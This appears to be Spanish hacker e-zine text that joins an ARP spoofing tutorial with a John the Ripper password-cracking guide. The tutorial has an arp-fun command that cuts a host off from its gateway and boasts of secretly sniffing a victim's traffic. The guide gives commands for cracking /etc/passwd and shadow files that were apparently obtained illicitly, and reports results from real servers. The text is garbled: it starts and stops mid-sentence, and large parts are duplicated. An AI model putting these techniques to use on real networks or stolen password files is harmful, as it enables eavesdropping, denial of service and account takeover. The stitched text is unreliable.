es el gateway a Internet de toda la LAN mediante una conexion dial-up,
pero la direccion de hardware que pusimos para este host es inventada y no
existe por lo que a partir de ahora nuestro amigo Powertech se va a quedar
sin salida a Internet :P
Este ejemplo de ARP Spoofing en particular no tiene mucha utilidad pero
quien dice que no podemos divertirnos un poco...
Las opciones del arp-fun como muchos otros ejemplos de ARP Spoofing los
pueden encontrar en el README de este programa.
~Kosak0 Team~
haciendo; por eso primero empezaremos con una breve y clara (espero..) explicacion del protocolo ARP y luego pasaremos a ver la tecnica del ARP Spoofing en si. Espero que disfruten de la lectura de este texto y les sirva como motivacion para investigar mas sobre el TCP/IP y todas las cosas interesantes y
divertidas que podemos hacer con el.. ;)
1. Protocolo ARP. Como todos saben el TCP/IP es lo que se llama una "suite" de protocolos en el cual se encuentra el ARP(Address Resolution Protocol) entre otros.
En el mundo TCP/IP nos identificamos con las direcciones IP(ej. 192.168.0.1),
pero en una red LAN del tipo ethernet o token ring nos vamos a identificar con la direccion de hardware(ej. 00:E0:7D:77:4E:55) que cada placa de red
posee; se usa este esquema de identificacion ya que por el mismo cable de
la red pueden pasar distintos tipos de protocolos y una direccion IP solo
tiene sentido en la suite TCP/IP.
Si por ejemplo queremos establecer una conexion con un host de la red, lo
que va a hacer el protocolo ARP es fijarse la direccion IP del host y
encargarse de conseguirnos la direccion de hardware.
Conexiones dial-up tipicas como las que hacemos a traves de la linea
telefonica no necesitan usar ARP, ya que no hay en juego ninguna placa de
red y por lo tanto direcciones de hardware que resolver. Si estamos usando Linux y tenemos configurada una placa de red en nuestra
PC, con el siguiente comando podremos ver su direccion de hardware:
[root@ezkracho /]# ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:E0:7D:77:4E:55
inet addr:192.168.0.1 Bcast:192.168.0.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
Interrupt:5 Base address:0xbc00
La direccion de hardware es grabada en la placa de red por el fabricante y
es unica; cada direccion de hardware es de 48 bits al contrario de las
direcciones IP que son de 32 bits.
Ahora que ya sabemos basicamente que es lo que hace ARP vamos a verlo un
poco mas en detalle, pero sin complicarnos demasiado.
Supongamos que armamos una peque~a red con unos amigos y queremos hacer un
telnet a la computadora de uno de ellos que tiene de host el nombre
"ezkracho".
Antes que nada nuestro cliente de telnet va a convertir el nombre ezkracho
en una direccion IP de 32 bits, esto lo puede hacer buscando en el archivo
/etc/hosts o en un servidor DNS que hayamos instalado.
Una vez que tenemos la direccion IP del host ezkracho el cliente de telnet
le va a decir al TCP que se encargue de establecer una conexion con esa
direccion de IP; aqui el TCP va a enviar un datagrama IP solicitando una
conexion al host ezkracho.
En nuestro ejemplo estamos en una red local comun por lo cual el datagrama
IP puede ir directamente hacia ese host, pero en el caso de que quisieramos
telnetear a un host en una red remota nuestro datagrama IP se rutearia
directamente hacia la salida predeterminada de la red, como por ejemplo un
router y de ahi seguiria hasta el proximo salto hasta llegar a destino.
Como habiamos explicado en una red LAN nos debemos identificar con la
direccion de hardware, por lo que ARP va a convertir nuestra direccion IP de
32 bits en nuestra direccion de hardware de 48 bits.
Luego ARP va a enviar un pedido o lo que se llama un "ARP request" al
broadcast, osea a cada host conectado en nuestra red, en el ARP request va
incluido la direccion IP del host ezkracho y lo que hace es preguntar "si
sos el due~o de esta direccion IP contestame con tu direccion de hardware".
El host ezkracho va a recibir este broadcast con el ARP request preguntando
por el y le va a contestar, esta respuesta se llama "ARP reply" y por
supuesto que en ella va incluida su direccion de hardware.
Una vez que se recibe el ARP reply con la direccion de hardware finalmente
vamos a poder terminar de enviar el datagrama IP al host ezkracho para
entablar la conexion. Y todo esto gracias a ARP :)
Muy bien, ahora que ya comprendemos mejor el funcionamiento de ARP vamos a
explicar que es lo que se conoce como "ARP Cache".
Para hacer mas eficiente el trabajo de resolver cual es la direccion de
hardware de un host cada vez que se la necesita averiguar, existe el ARP
Cache. Cada vez que algun host resuelve una direccion de hardware de otro
host, todos los demas guardan una copia en el cache para despues no tener
que volver a hacer ese mismo trabajo.
Cada direccion de hardware que entra al ARP Cache es guardada por unos 20
minutos(segun el OS), luego de ello se borra y si se la necesita se la tiene
que volver a pedir a menos que ya otro host la haya pedido por lo cual vuelve
a ingresar al cache y durara 20 minutos mas.
En Linux tenemos el comando "arp" que nos sirve para manipular el arp cache
de nuestro sistema. Si queremos ver el cache actual tenemos que hacer:
[root@ezkracho /]# arp -a
ezkracho (192.168.0.1) at 00:E0:7D:77:4E:55
powertech (192.168.0.3) at 00:00:E8:57:82:6B
La opcion "arp -a" nos muestra todas las entradas que hay en nuestro cache,
como vemos primero aparece el host, luego la direccion IP y luego la direccion
de hardware. Tenemos otras opciones del comando arp que tambien nos pueden
ser muy utiles, por ejemplo la opcion "arp -d" que nos permite borrar
cualquier entrada del cache pero esto solo puede ser hecho por el root. Hay
otras opciones interesantes que las pueden investigar poniendo "man arp" en
la consola.
Hay muchas otras cosas que se pueden explicar sobre el protocolo ARP, pero
al fin de este texto que es explicar el ARP Spoofing con esto nos alcanza.
2. ARP Spoofing.
Llegamos a lo divertido! a esta altura los que estuvieron prestando atencion
ya deben tener una idea de que se trata esto del ARP Spoofing, pero como
siempre hay algunos resagados vamos a explicarlo un poco.
Supongamos que yo le envio a un host victima un paquete con la direccion de
hardware de mi placa de red pero con otra direccion IP de un host de la red,
lo que va a suceder es que el host victima va a guardar esa informacion en
su ARP Cache y a partir de ese momento va a creer que nosotros somos otro
host de la red, porque cuando quiera enviarle algo al host que suplantamos
va a buscar la direcion IP en su cache y va a enviar todo a la direccion de
hardware que tenga asignada que por supuesto es la nuestra.
Esta tecnica como ya lo dije antes es muy simple y los diferentes usos que
se le pueda dar solo depende de nuestra imaginacion. Como anecdota, algo en
lo que nos fue muy util esta tecnica fue cuando estabamos en una LAN en una
reunion con gente de la scene Argentina y necesitabamos sniffear a una de
las computadoras de la red, el problema era que en la LAN no habian hubs
porque toda la interconexion era a traves de un switch por lo que el
trafico de la red no pasaba por nosotros y simplemente no podiamos ponernos
en modo promiscuo y comenzar a capturar paquetes. La solucion encontrada fue
muy simple, le enviamos un paquete a nuestra victima con nuestra direccion
de hardware pero con la direccion IP del gateway que nos daba salida a
Internet, luego creamos un alias de la direccion IP del gateway pero en
nuestra ethernet y luego lo forwardeamos al verdadero gateway. En si nuestra
victima, que por cierto son unos chicos que se creen muy bromistas, estuvieron
saliendo a Internet sin darse cuenta que primero pasaban por nosotros y que
los estuvimos sniffeando toda la noche. Quiero aprovechar para saludar a
dr_fdisk^ y airlink que nos dieron una gran mano esa noche ;)
Hay muchos programas que sirven para hacer todo lo comentado pero les
recomiendo el arp-fun de Ulandron(www.undersec.com) que es muy bueno y facil
de usar.
Veamos un ejemplo practico con el arp-fun:
[root@ezkracho /]# arp-fun -i eth0 -s 192.168.0.10 -a 0A:0B:0C:0D:0E:0F //
-d 192.168.0.3 -m 00:00:E8:57:82:6B -v -c 2
Attempting to send 2 packets
Source ip: 192.168.0.10
Dest ip: 192.168.0.3
Everything fine, 'til now. Let's build the packet
Looks nice, huh:
00 0000 57e8 6b82 0b0a 0d0c 0f0e 0608 0100
10 0008 0406 0200 0b0a 0d0c 0f0e a8c0 0a00
20 0000 57e8 6b82 a8c0 0300
Sent packet 1, waiting 0 seconds
Sent packet 2, waiting 0 seconds
Analizemos este ejemplo, aqui vemos que enviamos al host powertech que tiene
la direccion IP 192.168.0.3 y la direccion de hardware 00:00:E8:57:82:6B,
dos paquetes diciendole que somos el host cenobyte que tiene la direccion IP
192.168.0.10 y la direccion de hardware 0A:0B:0C:0D:0E:0F, el host cenobyte
es el gateway a Internet de toda la LAN mediante una conexion dial-up,
pero la direccion de hardware que pusimos para este host es inventada y no
existe por lo que a partir de ahora nuestro amigo Powertech se va a quedar
sin salida a Internet :P
Este ejemplo de ARP Spoofing en particular no tiene mucha utilidad pero
quien dice que no podemos divertirnos un poco...
Las opciones del arp-fun como muchos otros ejemplos de ARP Spoofing los
pueden encontrar en el README de este programa.
~Kosak0 Team~
Analisis del John The Ripper 1.6
Los passwords en un sistema UNIX generalmente se encuentran en el archivo
/etc/passwd, estos estan no muy bien encriptados, hasta no hace mucho a los
administradores no les importaba que ese archivo sea leido por personas
ajenas al sistema ya que crackearlos era algo casi imposible, hasta ahora
la unica manera de crackear estos passwords es encriptando palabras de
igual forma como lo hace el sistema e ir comparandolas hasta dar con la
palabra buscada, como soluci¢n a esto en algunos sistemas ocultan los
passwords en el archivo /etc/shadow generalmente, este archivo no tiene
permiso de lectura para todo mundo como el /etc/passwd y por eso mismo es
mas dificil conseguirlo, ojo, dificil pero no imposible, han surgido varios
programas para crackear estos passwords, pero sin duda el mas eficiente es
el John The Ripper, ya que es el mas rapido hasta ahora, muchos
administradores desconocen las existencia de este tipo de programas, lo que
es un gravisimo error ya que al ignorar que puede hacer este programa son
un blanco facil para un ataque del mismo, ya que hay bastante gente que
pregunta sobre el uso del john the ripper aqui analizaremos un poco algunas
de las posibilidades que este nos brinda.
Passwd
ÍÍÍÍÍÍ
Ok, ya tenemos el /etc/passwd, ¨como? bueno ese es otro tema X-D
Que es lo primero que hacemos, pues primero vemos que sea as¡
root:XpAxNqj.2Wh6.:0:0:root:/root:/bin/bash
si en el lugar donde esta "XpAxNqj.2Wh6." vemos "x" o "*" entonces los
passwords estan ocultos, eso lo veremos luego pero por ahora sigamos.
Al ver que si est n los passwords yo recomiendo usar primero la opci¢n
single asi
john -single passwd
donde passwd es el archivo donde se encuentran los passwords pero puede ser
cualquier otro nombre, asi que cuando veas passwd me estoy refiriendo al
archivo donde se encuentran estos passwords y shadow donde estan los passes
en caso de que esten ocultos.
La opci¢n single personalmente es la opci¢n que saca mas passwords, ya que
esta usa la informaci¢n que sale en el passwd sobre ese login, muchas veces,
bueno, much¡simas veces ponen de passwords (hey anota el dato XD) el mismo
login, o el nombre, o el apellido, etc, por ejemplo:
rhantos:RKxhLEYIi7b9o:150:2000:Roberto Hantos:/home/rhantos:/bin/csh
donde el password encriptado es roberto, en modo single este password sale
en mucho menos de un segundo, mas adelante le mostrare algunas cosas sobre
esto.
Listas de Palabras
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
Esto es muy importante si quieres crackear bastantes passwords, aunque de
seguro no sacaras tantos passwords como en modo single, pero si es una muy
buena opci¢n, se usa asi:
john -w:passwords.lst passwd
aqui estoy usando la lista de palabras que trae el john, aqui
podemos usar una opci¢n llamada rules, la cual a cada palabra le pone
variaciones, como sufijos y prefijos, esta opci¢n hace que el tiempo en
terminar sea mucho mayor que sin rules, y personalmente he sacado pocos
passwords con esta opci¢n pero si salen
john -w:passwords.lst passwd -rules
Incremental
ÍÍÍÍÍÍÍÍÍÍÍ
Sin duda, el modo incremental es una muy buena opci¢n, ya que si no
existiera esta opcion tuvieramos que crear listas de palabras del tipo
aaaaaaa hasta zzzzzzz, lo que ocupa mucha memoria en el DD, ademas de
que si vamos a incluir may£sculas y min£sculas seria peor, las opciones
en modo incremental son las siguientes:
alpha: Genera plabras con letras solamente, osea 26 letras
digits: Genera plabras con numeros solamente, desde el 0 hasta el 9
all: Genera plabras con letras, numeros y caracteres especiales, en total
son 90 caracteres, osea se pueden imaginar lo que tardar¡a en terminar
lanman: Es como el del l0phtcrack, nunca lo he usado.
las opciones son...
john -i:alpha passwd
No la he visto terminar, en alpha va probando todas las palabras que se
puedan crear hasta 8 caracteres
john -i:digits passwd
Esta si, con un promedio de 24500 c/s mi pc claro, un pentium 233 MHz MMX
con 32 MB de RAM un password termina en 2 horas y pico, no recuerdo bien,
pero se descubren bastantes, mucha gente pone su numero de c‚dula de
password que aqui en Venezuela es exactamente 8 n£meros, a menos que sea
c‚dula de viejo que son 7.
john -i:all passwd
Hay mucha gente que se obcesiona con un password de algun root y creen que
ajuro lo tiene que conseguir, a ellos les digo que no se obsecionen pero
si funciona, eso tambien depende del tipo de password y de la paciencia que
tengas, por ejemplo una vez puse a crackear un password de root, y a los
9 dias y 3 horas el password habia sido crackeado, restale importancia, y
solo lo pones a trabajar cuando no estes usando el computador, a menos que
tengas linux ya que no hay problema, esto lo digo pq si usas windows y
estas haciendo otras tareas con el y ademas crackeando el pass te va a
ir muy lento, el password que descubr¡ era de este estilo "1446igua"
(sin comillas claro claro que si el password hubiera sido algo
como ",4*V4x5B" seria casi imposible crackear, quiz s el "casi" este
de mas
Shadow
ÍÍÍÍÍÍ
Si el passwd esta shadow entonces tenemos que conseguir el /etc/shadow
pues al tenerlo tenemos que unir el shadow y el passwd para asi poder
trabajar con el john, para eso esta el unshadow, se usa asi:
unshadow PASSWORD-FILE SHADOW-FILE
y te mostrar en pantalla el archivo unido, pero eso no nos sirve,
tenemos que unirlo, entonces lo redireccionamos a otro archivo asi
unshadow PASSWORD-FILE SHADOW-FILE > nuevo-passwd
y luego podemos usar el archivo nuevo-passwd normalmente, como hemos
visto anteriormente.
Al conseguir un password este es enviado a un archivo llamado john.pot
y si hemos conseguido 2 passwords, no hay problema para saber cual es cual
pero si tenemos mas de 1000 passwords la cosa se nos complica, para eso
esta la opcion show, esta muestra los passwords crackeados, despues de
haber crackeado algunos passwords ponemos esto.
john -show nuevo-passwd
y pasa igual que con el shadow asi que lo hacemos asi
john -show nuevo-passwd > logins-passes
y donde va el password encriptado, pondra el password ya crackeado
Restore
ÍÍÍÍÍÍÍ
El restore es de mucha utilidad, sobre todo si estas crackeando passwords
muy dif¡ciles de crackear que llevan dias, meses, a¤os, siglos (bueno aqui
como que exagero un poco jeje) en crackear, ya que podemos parar cuando
lo deseamos y continuar cuando queramos desde el mismo lugar donde paramos,
¨arrecho no?
Para usar el restore hacemos lo siguiente
queremos crackear el password del root de la NASA
john -i passwd-root
paramos la ejecucion con CRTL C, y la resturamos asi
john -re
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
Nota: El john the ripper es muy flexible en cuanto a abreviaciones, como
por ejemplo el caso anterior, coloque, john -re que es igual a john -restore
tambien en el caso john -i passwd es igual a john -incremental:all passwd
john -wordfile:password.lst passwd es igual a john -w:passwd.lst passwd
john -i passwd -session:restore2 es igual a john -i passwd -se:restore2
john -single passwd es igual a john -si passwd etc, deben haber muchas
mas que no he colocado aqui, b£scalas y me avisas
-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-
Pero al parar una ejecuci¢n con CRTL C, el crea un archivo llamado restore
en el cual estan los datos de como iba el crackeo al momento de ser
interrumpido, y si por un descuido no hemos terminado de crackear ese
password y ponemos al john the ripper a crackear otro pass, el borra ese
restore y crea otro con la informacion del password que se esta crackeando,
para evitar esto hacemos esto
john -i passwd-root -se:restore-root
y para restaurarlos solo pones
john -re:restore-root
y listo, problema solucionado
Tambien podemos buscar passwords especificos, como por ejemplo alg£n tipo
de shell, los que tengan privilegios 0:0 (root), etc,
john -w:password.lst -rules -users:0 passwd
john -w:password.lst -rules -group:0 passwd
john -w:password.lst -rules -shells:sh,csh,tcsh,bash passwd
puede haber muchas variaciones, lo podemos poner en modo incremental en
vez de poner con listas de palabras
john -i -users:0 passwd
en fin, hay mucha posiblidades
Estad¡sticas
ÍÍÍÍÍÍÍÍÍÍÍÍ
Este texto no fue solamente escrito para quienes quieren violar la
seguridad de un sistema, sino tambien para los administradores que
quieran mantener su sistema fuera del alcance de un intruso, mis
recomendaciones personales son que deberian pasarle de vez en cuando
el john the ripper a su sistema para asi saber quienes tienen passwords
facilmente crackeables y obligarlos a cambiar estos passwords ya que
por su inconciencia ponen en juego la seguridad del sistema, segun
resultados REALES podemos ver lo siguiente:
Host N§ 1
En un servidor con 3916 cuentas fueron crackeados 1703 lo cual es un
43.5%, de esos 1703 passwords en modo single fueron crackeados 970 lo
que equivale a un 24.77% del total de passwords y un 57% del total de
passwords crackeados, los otros 733 passwords fueron crackeados con
listas de palabras, no fue usado el modo -rules ya que tardaria
demasiado en terminar, debido a la gran cantidad de passwords, pero
de seguro saldr¡an muchos mas, de estos passwords solo salieron 4 en
modo incremtal:digits, claro, no lo deje terminar, por la misma raz¢n,
pero revisando los passwords crackeados 51 (1.3%) passwords son el mismo
login, ejemplo, login: pepe password: pepe lo que es un gran peligro
para el sistema, algunos son ciudades o paises, caracas (11 veces),
barinas, maturin, y otras palabras como cocacola, cracker, y nombres
(de mujeres y de hombres) entre otros, ¨que haria una buena pol¡tica
con respecto a los passwords? veamos el proximo ejemplo...
Host N§ 2
En un host con una pol¡tica en la escojencia de los passwords muy buena,
seg£n dicen por ahi, hay una carta que te leen al momento de darte una
cuenta en el servidor en la cual comentan la importancia de tener un
password seguro, no solo para tu seguridad, sino la seguridad del
sistema, ha dado resultados pero siempre hay gente que no le para,
aqui hay 1359 cuentas y se nota que si funciono un poco la politica
de esta empresa, en modo single crackea solo 17 passwords, lo cual
viene siendo el 1.25%, comparado con el 24.77% del ejemplo anterior
se nota bastante la diferencia, y con listas de palabras fueron
crackeados hasta 40 passwords, lo que seria un 3%, que no se acerca
ni remotamente al 43.5% anteriormente visto, de estos 17 solo en 3
casos el login y el password era el mismo, lo que seria un 0.22%
tambien aqui gana este servidor, en contra del 1.3% del servidor
anterior, concluyendo, es muy importante una buena pol¡tica para la
escojencia de passwords pero no es 100% segura, a ver... creo que tengo
otros passwd por aca, veamos...
Host N§ 3
Aja, aqui est , analicemos esta situaci n, bueno este host me cay¢ bien,
sin duda el administrador esta aprendiendo unix por correspondencia,
parece que ya sabe usar el finger, jeje, si, la verdad, se ve bastante
de esto si buscas bien, administradores que cobran sin trabajar, bueno,
sigamos aqui hay 401 cuentas, de las cuales en modo single fueron
crackeados 143 passwords 35.66%, no parece alarmante en comparaci¢n
con el primer host evaluado pero si analizamos un poco... veamos, de
los 143 passwords crackeados 71 son el mismo login, ¨increible no? un
17.7% wow, que newbies no? seguimos comparando?? pues en el primer host
esta misma cifra era un 1.3%, en el segundo un 0.22% y aqui un GRAN
17.7%, osea se podr n imaginar que puede pasar en este caso }:->
Algo que casi se me olvidaba es que siempre salen bastantes passwords
de este estilo, por ejemplo, login cuaima y password cuaima98 o
cuaima97 o 99 esto es muy importante a la hora de hacer un ataque de
fuerza bruta, en este host hubo 31 passwords de este tipo.
Recomendaciones Finales
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
Tengo otros /etc/passwd por ahi pero no quiero inundar esto de n£meros
aunque me parece muy importante ver cuales son las debilidades en cuanto
a los passwords usados por los usuarios comunes, mi recomendacion para los
administradores es ademas de la pol¡tica de passwords como en el ejemplo
numero 2, seria como dije arriba, pasarle a su sistema el john the ripper
por lo menos una vez por semana y avisarle a los usuarios sobre sus
passwords y que deben cambiarlos ya que ponen en peligro el sistema, y
si ellos no lo hacen lo hace el mismo administrador y le envias el
password antes de cambiarlo porsupuesto, pero esto se debe hacer
inmediatamente, ya que si alguien ya entro a el sistema que manejamos
quizas ya tenga el /etc/passwd y cambiar todos los passwords en un
sistema de 3000 usuarios es mas dificil no?
/etc/passwd, estos estan no muy bien encriptados, hasta no hace mucho a los
administradores no les importaba que ese archivo sea leido por personas
ajenas al sistema ya que crackearlos era algo casi imposible, hasta ahora
la unica manera de crackear estos passwords es encriptando palabras de
igual forma como lo hace el sistema e ir comparandolas hasta dar con la
palabra buscada, como soluci¢n a esto en algunos sistemas ocultan los
passwords en el archivo /etc/shadow generalmente, este archivo no tiene
permiso de lectura para todo mundo como el /etc/passwd y por eso mismo es
mas dificil conseguirlo, ojo, dificil pero no imposible, han surgido varios
programas para crackear estos passwords, pero sin duda el mas eficiente es
el John The Ripper, ya que es el mas rapido hasta ahora, muchos
administradores desconocen las existencia de este tipo de programas, lo que
es un gravisimo error ya que al ignorar que puede hacer este programa son
un blanco facil para un ataque del mismo, ya que hay bastante gente que
pregunta sobre el uso del john the ripper aqui analizaremos un poco algunas
de las posibilidades que este nos brinda.
Passwd
ÍÍÍÍÍÍ
Ok, ya tenemos el /etc/passwd, ¨como? bueno ese es otro tema X-D
Que es lo primero que hacemos, pues primero vemos que sea as¡
root:XpAxNqj.2Wh6.:0:0:root:/root:/bin/bash
si en el lugar donde esta "XpAxNqj.2Wh6." vemos "x" o "*" entonces los
passwords estan ocultos, eso lo veremos luego pero por ahora sigamos.
Al ver que si est n los passwords yo recomiendo usar primero la opci¢n
single asi
john -single passwd
donde passwd es el archivo donde se encuentran los passwords pero puede ser
cualquier otro nombre, asi que cuando veas passwd me estoy refiriendo al
archivo donde se encuentran estos passwords y shadow donde estan los passes
en caso de que esten ocultos.
La opci¢n single personalmente es la opci¢n que saca mas passwords, ya que
esta usa la informaci¢n que sale en el passwd sobre ese login, muchas veces,
bueno, much¡simas veces ponen de passwords (hey anota el dato XD) el mismo
login, o el nombre, o el apellido, etc, por ejemplo:
rhantos:RKxhLEYIi7b9o:150:2000:Roberto Hantos:/home/rhantos:/bin/csh
donde el password encriptado es roberto, en modo single este password sale
en mucho menos de un segundo, mas adelante le mostrare algunas cosas sobre
esto.
Listas de Palabras
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
Esto es muy importante si quieres crackear bastantes passwords, aunque de
seguro no sacaras tantos passwords como en modo single, pero si es una muy
buena opci¢n, se usa asi:
john -w:passwords.lst passwd
aqui estoy usando la lista de palabras que trae el john, aqui
podemos usar una opci¢n llamada rules, la cual a cada palabra le pone
variaciones, como sufijos y prefijos, esta opci¢n hace que el tiempo en
terminar sea mucho mayor que sin rules, y personalmente he sacado pocos
passwords con esta opci¢n pero si salen
john -w:passwords.lst passwd -rules
Incremental
ÍÍÍÍÍÍÍÍÍÍÍ
Sin duda, el modo incremental es una muy buena opci¢n, ya que si no
existiera esta opcion tuvieramos que crear listas de palabras del tipo
aaaaaaa hasta zzzzzzz, lo que ocupa mucha memoria en el DD, ademas de
que si vamos a incluir may£sculas y min£sculas seria peor, las opciones
en modo incremental son las siguientes:
alpha: Genera plabras con letras solamente, osea 26 letras
digits: Genera plabras con numeros solamente, desde el 0 hasta el 9
all: Genera plabras con letras, numeros y caracteres especiales, en total
son 90 caracteres, osea se pueden imaginar lo que tardar¡a en terminar
lanman: Es como el del l0phtcrack, nunca lo he usado.
las opciones son...
john -i:alpha passwd
No la he visto terminar, en alpha va probando todas las palabras que se
puedan crear hasta 8 caracteres
john -i:digits passwd
Esta si, con un promedio de 24500 c/s mi pc claro, un pentium 233 MHz MMX
con 32 MB de RAM un password termina en 2 horas y pico, no recuerdo bien,
pero se descubren bastantes, mucha gente pone su numero de c‚dula de
password que aqui en Venezuela es exactamente 8 n£meros, a menos que sea
c‚dula de viejo que son 7.
john -i:all passwd
Hay mucha gente que se obcesiona con un password de algun root y creen que
ajuro lo tiene que conseguir, a ellos les digo que no se obsecionen pero
si funciona, eso tambien depende del tipo de password y de la paciencia que
tengas, por ejemplo una vez puse a crackear un password de root, y a los
9 dias y 3 horas el password habia sido crackeado, restale importancia, y
solo lo pones a trabajar cuando no estes usando el computador, a menos que
tengas linux ya que no hay problema, esto lo digo pq si usas windows y
estas haciendo otras tareas con el y ademas crackeando el pass te va a
ir muy lento, el password que descubr¡ era de este estilo "1446igua"
(sin comillas claro claro que si el password hubiera sido algo
como ",4*V4x5B" seria casi imposible crackear, quiz s el "casi" este
de mas
Shadow
ÍÍÍÍÍÍ
Si el passwd esta shadow entonces tenemos que conseguir el /etc/shadow
pues al tenerlo tenemos que unir el shadow y el passwd para asi poder
trabajar con el john, para eso esta el unshadow, se usa asi:
unshadow PASSWORD-FILE SHADOW-FILE
y te mostrar en pantalla el archivo unido, pero eso no nos sirve,
tenemos que unirlo, entonces lo redireccionamos a otro archivo asi
unshadow PASSWORD-FILE SHADOW-FILE > nuevo-passwd
y luego podemos usar el archivo nuevo-passwd normalmente, como hemos
visto anteriormente.
Al conseguir un password este es enviado a un archivo llamado john.pot
y si hemos conseguido 2 passwords, no hay problema para saber cual es cual
pero si tenemos mas de 1000 passwords la cosa se nos complica, para eso
esta la opcion show, esta muestra los passwords crackeados, despues de
haber crackeado algunos passwords ponemos esto.
john -show nuevo-passwd
y pasa igual que con el shadow asi que lo hacemos asi
john -show nuevo-passwd > logins-passes
y donde va el password encriptado, pondra el password ya crackeado
Restore
ÍÍÍÍÍÍÍ
El restore es de mucha utilidad, sobre todo si estas crackeando passwords
muy dif¡ciles de crackear que llevan dias, meses, a¤os, siglos (bueno aqui
como que exagero un poco jeje) en crackear, ya que podemos parar cuando
lo deseamos y continuar cuando queramos desde el mismo lugar donde paramos,
¨arrecho no?
Para usar el restore hacemos lo siguiente
queremos crackear el password del root de la NASA
john -i passwd-root
paramos la ejecucion con CRTL C, y la resturamos asi
john -re
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
Nota: El john the ripper es muy flexible en cuanto a abreviaciones, como
por ejemplo el caso anterior, coloque, john -re que es igual a john -restore
tambien en el caso john -i passwd es igual a john -incremental:all passwd
john -wordfile:password.lst passwd es igual a john -w:passwd.lst passwd
john -i passwd -session:restore2 es igual a john -i passwd -se:restore2
john -single passwd es igual a john -si passwd etc, deben haber muchas
mas que no he colocado aqui, b£scalas y me avisas
-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-
Pero al parar una ejecuci¢n con CRTL C, el crea un archivo llamado restore
en el cual estan los datos de como iba el crackeo al momento de ser
interrumpido, y si por un descuido no hemos terminado de crackear ese
password y ponemos al john the ripper a crackear otro pass, el borra ese
restore y crea otro con la informacion del password que se esta crackeando,
para evitar esto hacemos esto
john -i passwd-root -se:restore-root
y para restaurarlos solo pones
john -re:restore-root
y listo, problema solucionado
Tambien podemos buscar passwords especificos, como por ejemplo alg£n tipo
de shell, los que tengan privilegios 0:0 (root), etc,
john -w:password.lst -rules -users:0 passwd
john -w:password.lst -rules -group:0 passwd
john -w:password.lst -rules -shells:sh,csh,tcsh,bash passwd
puede haber muchas variaciones, lo podemos poner en modo incremental en
vez de poner con listas de palabras
john -i -users:0 passwd
en fin, hay mucha posiblidades
Estad¡sticas
ÍÍÍÍÍÍÍÍÍÍÍÍ
Este texto no fue solamente escrito para quienes quieren violar la
seguridad de un sistema, sino tambien para los administradores que
quieran mantener su sistema fuera del alcance de un intruso, mis
recomendaciones personales son que deberian pasarle de vez en cuando
el john the ripper a su sistema para asi saber quienes tienen passwords
facilmente crackeables y obligarlos a cambiar estos passwords ya que
por su inconciencia ponen en juego la seguridad del sistema, segun
resultados REALES podemos ver lo siguiente:
Host N§ 1
En un servidor con 3916 cuentas fueron crackeados 1703 lo cual es un
43.5%, de esos 1703 passwords en modo single fueron crackeados 970 lo
que equivale a un 24.77% del total de passwords y un 57% del total de
passwords crackeados, los otros 733 passwords fueron crackeados con
listas de palabras, no fue usado el modo -rules ya que tardaria
demasiado en terminar, debido a la gran cantidad de passwords, pero
de seguro saldr¡an muchos mas, de estos passwords solo salieron 4 en
modo incremtal:digits, claro, no lo deje terminar, por la misma raz¢n,
pero revisando los passwords crackeados 51 (1.3%) passwords son el mismo
login, ejemplo, login: pepe password: pepe lo que es un gran peligro
para el sistema, algunos son ciudades o paises, caracas (11 veces),
barinas, maturin, y otras palabras como cocacola, cracker, y nombres
(de mujeres y de hombres) entre otros, ¨que haria una buena pol¡tica
con respecto a los passwords? veamos el proximo ejemplo...
Host N§ 2
En un host con una pol¡tica en la escojencia de los passwords muy buena,
seg£n dicen por ahi, hay una carta que te leen al momento de darte una
cuenta en el servidor en la cual comentan la importancia de tener un
password seguro, no solo para tu seguridad, sino la seguridad del
sistema, ha dado resultados pero siempre hay gente que no le para,
aqui hay 1359 cuentas y se nota que si funciono un poco la politica
de esta empresa, en modo single crackea solo 17 passwords, lo cual
viene siendo el 1.25%, comparado con el 24.77% del ejemplo anterior
se nota bastante la diferencia, y con listas de palabras fueron
crackeados hasta 40 passwords, lo que seria un 3%, que no se acerca
ni remotamente al 43.5% anteriormente visto, de estos 17 solo en 3
casos el login y el password era el mismo, lo que seria un 0.22%
tambien aqui gana este servidor, en contra del 1.3% del servidor
anterior, concluyendo, es muy importante una buena pol¡tica para la
escojencia de passwords pero no es 100% segura, a ver... creo que tengo
otros passwd por aca, veamos...
Host N§ 3
Aja, aqui est , analicemos esta situaci n, bueno este host me cay¢ bien,
sin duda el administrador esta aprendiendo unix por correspondencia,
parece que ya sabe usar el finger, jeje, si, la verdad, se ve bastante
de esto si buscas bien, administradores que cobran sin trabajar, bueno,
sigamos aqui hay 401 cuentas, de las cuales en modo single fueron
crackeados 143 passwords 35.66%, no parece alarmante en comparaci¢n
con el primer host evaluado pero si analizamos un poco... veamos, de
los 143 passwords crackeados 71 son el mismo login, ¨increible no? un
17.7% wow, que newbies no? seguimos comparando?? pues en el primer host
esta misma cifra era un 1.3%, en el segundo un 0.22% y aqui un GRAN
17.7%, osea se podr n imaginar que puede pasar en este caso }:->
Algo que casi se me olvidaba es que siempre salen bastantes passwords
de este estilo, por ejemplo, login cuaima y password cuaima98 o
cuaima97 o 99 esto es muy importante a la hora de hacer un ataque de
fuerza bruta, en este host hubo 31 passwords de este tipo.
Recomendaciones Finales
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
Tengo otros /etc/passwd por ahi pero no quiero inundar esto de n£meros
aunque me parece muy importante ver cuales son las debilidades en cuanto
a los passwords usados por los usuarios comunes, mi recomendacion para los
